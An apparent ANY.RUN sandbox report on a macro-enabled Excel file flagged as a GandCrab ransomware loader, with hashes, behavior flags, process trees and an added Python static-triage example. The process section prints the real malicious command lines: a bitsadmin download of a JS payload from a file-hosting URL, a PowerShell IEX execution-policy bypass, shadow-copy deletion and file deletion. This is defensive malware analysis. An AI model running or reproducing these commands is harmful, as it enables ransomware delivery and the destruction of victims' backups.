General Info

File name

SOC test.xlsm

Full analysis
https://app.any.run/tasks/025eaa6b-a45e-4499-b5aa-fdc2eaa2ef64
Verdict
Malicious activity
Analysis date
1/10/2019, 20:53:36
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
ransomware
gandcrab
trojan
Indicators:

MIME:
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info:
Microsoft Excel 2007+
MD5

977924ef58a2edda76a9ba8c30cfb07d

SHA1

e172616d1df9b762e9dd7c3f357e3071ebc3a11b

SHA256

88c6b4ef5c42bb66cebf8825d693b58ef78f9c9feef7cd884eef823c78f0639a

SSDEEP

768:NrIjaPdlcZnH938rL40tUYwJgsb19nQFX4aqnRUPegn:V/PdeZdKLttigw9nQFX2UPegn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Dropped file may contain instructions of ransomware
  • powershell.exe (PID: 3596)
Uses BITSADMIN.EXE for downloading application
  • EXCEL.EXE (PID: 2972)
Executes scripts
  • EXCEL.EXE (PID: 2972)
Actions look like stealing of personal data
  • powershell.exe (PID: 3596)
GandCrab keys found
  • powershell.exe (PID: 3596)
Deletes shadow copies
  • powershell.exe (PID: 3596)
Renames files like Ransomware
  • powershell.exe (PID: 3596)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 2972)
Writes file to Word startup folder
  • powershell.exe (PID: 3596)
Connects to CnC server
  • powershell.exe (PID: 3596)
Reads Internet Cache Settings
  • powershell.exe (PID: 3596)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 3596)
Reads the cookies of Mozilla Firefox
  • powershell.exe (PID: 3596)
Executes PowerShell scripts
  • WScript.exe (PID: 3328)
Creates files like Ransomware instruction
  • powershell.exe (PID: 3596)
Creates files in the user directory
  • WScript.exe (PID: 3328)
  • powershell.exe (PID: 3596)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 2972)
Reads settings of System Certificates
  • powershell.exe (PID: 3596)
Dropped object may contain TOR URLs
  • powershell.exe (PID: 3596)

Find more information about signature artifacts and mapping to the MITRE ATT&CK™ matrix in the full report

Static information

TRiD
.xlsm
|   Excel Microsoft Office Open XML Format document (with Macro) (50.8%)
.xlsx
|   Excel Microsoft Office Open XML Format document (30%)
.zip
|   Open Packaging Conventions container (15.4%)
.zip
|   ZIP compressed archive (3.5%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0xf3ea132d
ZipCompressedSize:
395
ZipUncompressedSize:
1257
ZipFileName:
[Content_Types].xml
XMP
Creator:
null
XML
LastModifiedBy:
null
CreateDate:
2006:09:16 00:00:00Z
ModifyDate:
2019:01:10 19:53:09Z
Application:
Microsoft Excel
DocSecurity:
None
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
Sheet1
Company:
null
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
15.03
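
The TRiD and EXIF blocks above are what an external identifier sees from the outside of the package; the MIME line reports the generic `spreadsheetml.sheet` type even though the file is macro-enabled, because MIME sniffers do not open the container. The following Python is an added example, not part of the ANY.RUN report or of the sample: it builds a constructed stand-in package carrying the metadata values shown above (no real macro code inside), then triages it the way a practitioner would triage the real `.xlsm` offline: the main-part content type override (the decisive macro indicator), the `vbaProject.bin` part and its OLE header, the zip entry timestamps, and the `docProps` metadata. The flag names and the five-year created/modified heuristic are this example's own choices.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
CP_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
DC_NS = "http://purl.org/dc/elements/1.1/"
DCTERMS_NS = "http://purl.org/dc/terms/"
EP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
XLSM_MAIN = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
VBA_CT = "application/vnd.ms-office.vbaProject"
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # [MS-CFB] header; vbaProject.bin must start with it
ZIP_EPOCH = (1980, 1, 1, 0, 0, 0)                 # DOS epoch, what Office stamps on every entry


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for the sample: a minimal macro-enabled package carrying the
    metadata values the report's EXIF section shows. It contains no real VBA code."""
    content_types = (
        f'<Types xmlns="{CT_NS}">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'<Default Extension="bin" ContentType="{VBA_CT}"/>'
        f'<Override PartName="/xl/workbook.xml" ContentType="{XLSM_MAIN}"/>'
        "</Types>"
    )
    core = (
        f'<cp:coreProperties xmlns:cp="{CP_NS}" xmlns:dc="{DC_NS}" xmlns:dcterms="{DCTERMS_NS}">'
        "<dc:creator></dc:creator><cp:lastModifiedBy></cp:lastModifiedBy>"
        "<dcterms:created>2006-09-16T00:00:00Z</dcterms:created>"
        "<dcterms:modified>2019-01-10T19:53:09Z</dcterms:modified>"
        "</cp:coreProperties>"
    )
    app = (f'<Properties xmlns="{EP_NS}"><Application>Microsoft Excel</Application>'
           "<AppVersion>15.0300</AppVersion></Properties>")
    parts = [
        ("[Content_Types].xml", content_types.encode()),
        ("docProps/core.xml", core.encode()),
        ("docProps/app.xml", app.encode()),
        ("xl/workbook.xml", b"<workbook/>"),
        ("xl/vbaProject.bin", OLE_MAGIC + b"\x00" * 504),   # header-only OLE container
    ]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in parts:
            z.writestr(zipfile.ZipInfo(name, date_time=ZIP_EPOCH), data, zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def _text(root, tag):
    el = root.find(tag)
    return (el.text or "").strip() if el is not None else None


def triage_ooxml(data: bytes) -> dict:
    """Static triage of an OOXML package: macro content type, VBA part sanity, metadata."""
    z = zipfile.ZipFile(io.BytesIO(data))
    names = z.namelist()
    ct = ET.fromstring(z.read("[Content_Types].xml"))
    overrides = {o.get("PartName"): o.get("ContentType") for o in ct.iter(f"{{{CT_NS}}}Override")}
    defaults = {d.get("Extension", "").lower(): d.get("ContentType") for d in ct.iter(f"{{{CT_NS}}}Default")}

    def part_type(name):   # Override wins over the per-extension Default
        return overrides.get("/" + name) or defaults.get(name.rsplit(".", 1)[-1].lower())

    vba_parts = [n for n in names if part_type(n) == VBA_CT]
    r = {
        "main_part_type": overrides.get("/xl/workbook.xml"),
        "vba_parts": vba_parts,
        "vba_is_ole": bool(vba_parts) and all(z.read(n).startswith(OLE_MAGIC) for n in vba_parts),
        "all_zip_times_1980": all(i.date_time == ZIP_EPOCH for i in z.infolist()),
        "creator": None, "last_modified_by": None, "created": None, "modified": None,
        "application": None, "app_version": None,
    }
    if "docProps/core.xml" in names:
        core = ET.fromstring(z.read("docProps/core.xml"))
        r["creator"] = _text(core, f"{{{DC_NS}}}creator")
        r["last_modified_by"] = _text(core, f"{{{CP_NS}}}lastModifiedBy")
        r["created"] = _text(core, f"{{{DCTERMS_NS}}}created")
        r["modified"] = _text(core, f"{{{DCTERMS_NS}}}modified")
    if "docProps/app.xml" in names:
        app = ET.fromstring(z.read("docProps/app.xml"))
        r["application"] = _text(app, f"{{{EP_NS}}}Application")
        r["app_version"] = _text(app, f"{{{EP_NS}}}AppVersion")

    flags = []
    if "macroEnabled" in (r["main_part_type"] or "") or vba_parts:
        flags.append("macro_enabled_workbook")
    if vba_parts and not r["vba_is_ole"]:
        flags.append("vba_part_not_ole")             # mislabeled or tampered vbaProject.bin
    if not r["creator"] and not r["last_modified_by"]:
        flags.append("author_metadata_blank")
    if r["created"] and r["modified"] and int(r["modified"][:4]) - int(r["created"][:4]) >= 5:
        flags.append("created_far_before_modified")  # template date, not authoring history
    r["flags"] = flags
    return r


if __name__ == "__main__":
    for k, v in triage_ooxml(build_sample_xlsm()).items():
        print(f"{k}: {v}")
```

Two caveats when reading the output against the report: the 1980-01-01 `ZipModifyDate` is what Office itself writes on every entry, so it is not an indicator on its own; and a blank creator together with a 2006 creation date on a file modified in 2019 says the document came from a template or generator, not that a person authored it, which matches the `Creator: null` and `CreateDate: 2006:09:16` fields above.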

Screenshots

Processes

Total processes
46
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

start → excel.exe (no specs) → bitsadmin.exe (no specs); excel.exe → wscript.exe (no specs) → powershell.exe (#GANDCRAB) → wmic.exe (no specs); powershell.exe → cmd.exe (no specs) → timeout.exe (no specs)
Specs description
Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information


PID
2972
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\scrrun.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\bitsadmin.exe
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wscript.exe
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\program files\common files\system\ado\msadox.dll

PID
3344
CMD
"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal https://download1591.mediafire.com/50dbuyji2mvg/lqn7rd8dez3cvmc/obfuscated.tmp C:\Users\admin\AppData\Local\Temp\\pepe.js
Path
C:\Windows\System32\bitsadmin.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3328
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\pepe.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\mlang.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
3596
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "IEX (([System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\tnqalxuybs.log')).Replace('?',''));"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll

PID
2884
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
3960
CMD
"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /f /q
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
